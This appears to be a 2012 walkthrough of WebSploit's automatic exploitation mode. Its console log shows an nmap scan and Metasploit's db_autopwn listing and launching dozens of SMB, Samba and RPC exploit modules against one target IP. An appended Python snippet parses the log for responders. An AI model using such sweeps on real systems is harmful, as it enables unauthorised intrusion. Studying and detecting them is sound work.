WebSploit 3 Automatic Exploitation
Posted on 2012-10-2 15:57:02
root@Dis9Team:/pen/WebSploit# ./websploit

        ID & Name                         Description
        ------------                        --------------
        [1]WebSite Attack Vector         Scanners,Crawlers For WebSite
        [2]Network Attack Vector         Network Attack Tools
        [3]Automatic Exploiter                 Automatic Exploit Vulnerability
        [4]Format Infector                 Inject Custom Payload Into File Formats
        [5]Web Tools                         WebSite Tools

        [88]Update                         Update WebSploit Toolkit
        [99]Exit                         Exit


wsf > 3 # select the module

        ID & Method                         Description
        ------------                        --------------
        [1]Service Autopwn                 Automatic Exploite Victim Services
        [2]Browser Autopwn                 HTTP Client Automatic Exploiter

        [99]Main Menu                         Go To Main Menu

wsf:Autopwn > 1  # select automatic exploitation
wsf:Autopwn > Enter Target IP Address : 5.5.5.4  # enter the target address
[*]Your Target Address : 5.5.5.4
[*]Engine Has Been Started.
[*]Please Wait ...
Metasploit is then loaded automatically; the error occurs here:
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 901 exploits - 491 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
       =[ svn r15622 updated today (2012.07.12)

[*] Processing /tmp/websploit_autopwn.rc for ERB directives.
resource (/tmp/websploit_autopwn.rc)> workspace -d websploit
[*] Deleted workspace: websploit
resource (/tmp/websploit_autopwn.rc)> workspace -a websploit
[*] Added workspace: websploit
resource (/tmp/websploit_autopwn.rc)> db_nmap 5.5.5.4
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2012-07-13 12:33 PDT
[*] Nmap: Nmap scan report for 5.5.5.4
[*] Nmap: Host is up (0.00023s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 135/tcp  open  msrpc
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 3389/tcp open  ms-term-serv
[*] Nmap: MAC Address: 08:00:27:7C:3B:F1 (Cadmus Computer Systems)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds
resource (/tmp/websploit_autopwn.rc)> load /tmp/db_autopwn.rb
[*] Successfully loaded plugin: db_autopwn
resource (/tmp/websploit_autopwn.rc)> db_autopwn -t -x -p -e
Re-enter the command:


msf > db_autopwn  -p -e -t

Wait for the results:
msf > db_autopwn  -p -e -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-]          This code is not well maintained, crashes systems, and crashes itself.
[-]          Use only if you understand it's current limitations/issues.
[-]          Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 8 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   5.5.5.4:135  exploit/windows/dcerpc/ms03_026_dcom  (port match)
[*]   5.5.5.4:139  exploit/freebsd/samba/trans2open  (port match)
[*]   5.5.5.4:139  exploit/linux/samba/chain_reply  (port match)
[*]   5.5.5.4:139  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   5.5.5.4:139  exploit/linux/samba/trans2open  (port match)
[*]   5.5.5.4:139  exploit/multi/ids/snort_dce_rpc  (port match)
[*]   5.5.5.4:139  exploit/multi/samba/nttrans  (port match)
[*]   5.5.5.4:139  exploit/multi/samba/usermap_script  (port match)
[*]   5.5.5.4:139  exploit/netware/smb/lsass_cifs  (port match)
[*]   5.5.5.4:139  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   5.5.5.4:139  exploit/solaris/samba/trans2open  (port match)
[*]   5.5.5.4:139  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   5.5.5.4:139  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   5.5.5.4:139  exploit/windows/oracle/extjob  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/psexec  (port match)
[*]   5.5.5.4:139  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*]   5.5.5.4:445  exploit/freebsd/samba/trans2open  (port match)
[*]   5.5.5.4:445  exploit/linux/samba/chain_reply  (port match)
[*]   5.5.5.4:445  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   5.5.5.4:445  exploit/linux/samba/trans2open  (port match)
[*]   5.5.5.4:445  exploit/multi/samba/nttrans  (port match)
[*]   5.5.5.4:445  exploit/multi/samba/usermap_script  (port match)
[*]   5.5.5.4:445  exploit/netware/smb/lsass_cifs  (port match)
[*]   5.5.5.4:445  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   5.5.5.4:445  exploit/solaris/samba/trans2open  (port match)
[*]   5.5.5.4:445  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   5.5.5.4:445  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   5.5.5.4:445  exploit/windows/oracle/extjob  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/psexec  (port match)
[*]   5.5.5.4:445  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*] ================================================================================
[*]
[*]
[*] (1/54 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 5.5.5.4:135...
[*] (2/54 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 5.5.5.4:139...
[*] (3/54 [0 sessions]): Launching exploit/linux/samba/chain_reply against 5.5.5.4:139...
[*] (4/54 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 5.5.5.4:139...
[*] (5/54 [0 sessions]): Launching exploit/linux/samba/trans2open against 5.5.5.4:139...
[*] (6/54 [0 sessions]): Launching exploit/multi/ids/snort_dce_rpc against 5.5.5.4:139...
[*] (7/54 [0 sessions]): Launching exploit/multi/samba/nttrans against 5.5.5.4:139...
[*] (8/54 [0 sessions]): Launching exploit/multi/samba/usermap_script against 5.5.5.4:139...
[*] (9/54 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 5.5.5.4:139...
[*] (10/54 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 5.5.5.4:139...
[*] (11/54 [0 sessions]): Launching exploit/solaris/samba/trans2open against 5.5.5.4:139...
[*] (12/54 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 5.5.5.4:139...
[*] (13/54 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 5.5.5.4:139...
[*] (14/54 [0 sessions]): Launching exploit/windows/oracle/extjob against 5.5.5.4:139...
[*] (15/54 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 5.5.5.4:139...
[*] (16/54 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 5.5.5.4:139...
[*] (17/54 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 5.5.5.4:139...
[*] (18/54 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 5.5.5.4:139...
[*] (19/54 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 5.5.5.4:139...
[*] (20/54 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 5.5.5.4:139...
[*] (21/54 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 5.5.5.4:139...
[*] (22/54 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 5.5.5.4:139...
[*] (23/54 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 5.5.5.4:139...
[*] (24/54 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 5.5.5.4:139...
[*] (25/54 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 5.5.5.4:139...
[*] (26/54 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 5.5.5.4:139...
[*] (27/54 [0 sessions]): Launching exploit/windows/smb/psexec against 5.5.5.4:139...
[*] (28/54 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 5.5.5.4:139...
[*] (29/54 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 5.5.5.4:445...
[*] (30/54 [0 sessions]): Launching exploit/linux/samba/chain_reply against 5.5.5.4:445...
[*] (31/54 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 5.5.5.4:445...
[*] (32/54 [0 sessions]): Launching exploit/linux/samba/trans2open against 5.5.5.4:445...
[*] (33/54 [0 sessions]): Launching exploit/multi/samba/nttrans against 5.5.5.4:445...
[*] (34/54 [0 sessions]): Launching exploit/multi/samba/usermap_script against 5.5.5.4:445...
[*] (35/54 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 5.5.5.4:445...
[*] (36/54 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 5.5.5.4:445...
[*] (37/54 [0 sessions]): Launching exploit/solaris/samba/trans2open against 5.5.5.4:445...
[*] (38/54 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 5.5.5.4:445...
[*] (39/54 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 5.5.5.4:445...
[*] (40/54 [0 sessions]): Launching exploit/windows/oracle/extjob against 5.5.5.4:445...
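
Reading the console log above the way an incident responder or report reviewer would: every match is a "port match", so modules written for FreeBSD, Linux, OS X and Solaris are launched at a host whose open services (msrpc, microsoft-ds, ms-term-serv) look like Windows. The Python below is an added example, not part of the original post or of WebSploit/Metasploit; `parse_launches`, `summarize` and the `host_platform="windows"` default are assumptions made for illustration.

```python
import re
from collections import Counter

# Constructed sample: a few lines copied from the console output in the post.
SAMPLE = """\
[*] (1/54 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 5.5.5.4:135...
[*] (2/54 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 5.5.5.4:139...
[*] (3/54 [0 sessions]): Launching exploit/linux/samba/chain_reply against 5.5.5.4:139...
[*] (24/54 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 5.5.5.4:139...
[*] (36/54 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 5.5.5.4:445...
[*] (40/54 [0 sessions]): Launching exploit/windows/oracle/extjob against 5.5.5.4:445...
[*] Nmap: 445/tcp  open  microsoft-ds
"""

# Matches the "(n/total [k sessions]): Launching <module> against <ip>:<port>..." lines.
LAUNCH = re.compile(
    r"\((\d+)/(\d+) \[(\d+) sessions\]\): Launching "
    r"(exploit/(\w+)/\S+) against (\d{1,3}(?:\.\d{1,3}){3}):(\d+)\.\.\."
)

def parse_launches(text):
    """Return one dict per 'Launching ...' line; all other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LAUNCH.search(line)
        if m:
            seq, total, sessions, module, platform, host, port = m.groups()
            events.append({"seq": int(seq), "total": int(total),
                           "sessions": int(sessions), "module": module,
                           "platform": platform, "host": host, "port": int(port)})
    return events

def summarize(events, host_platform="windows"):
    """Count launches per port and list modules written for another platform.

    host_platform is an assumption inferred from the nmap service names;
    'multi' modules are treated as applicable to any platform.
    """
    per_port = Counter(e["port"] for e in events)
    mismatched = [e["module"] for e in events
                  if e["platform"] not in (host_platform, "multi")]
    return {"per_port": dict(per_port), "mismatched": mismatched,
            "sessions_opened": max((e["sessions"] for e in events), default=0)}

if __name__ == "__main__":
    print(summarize(parse_launches(SAMPLE)))
```

Run over the full log, the per-port counts show how much traffic one run pushes at 135, 139 and 445 in a few seconds, which is the burst a network sensor should be expected to flag.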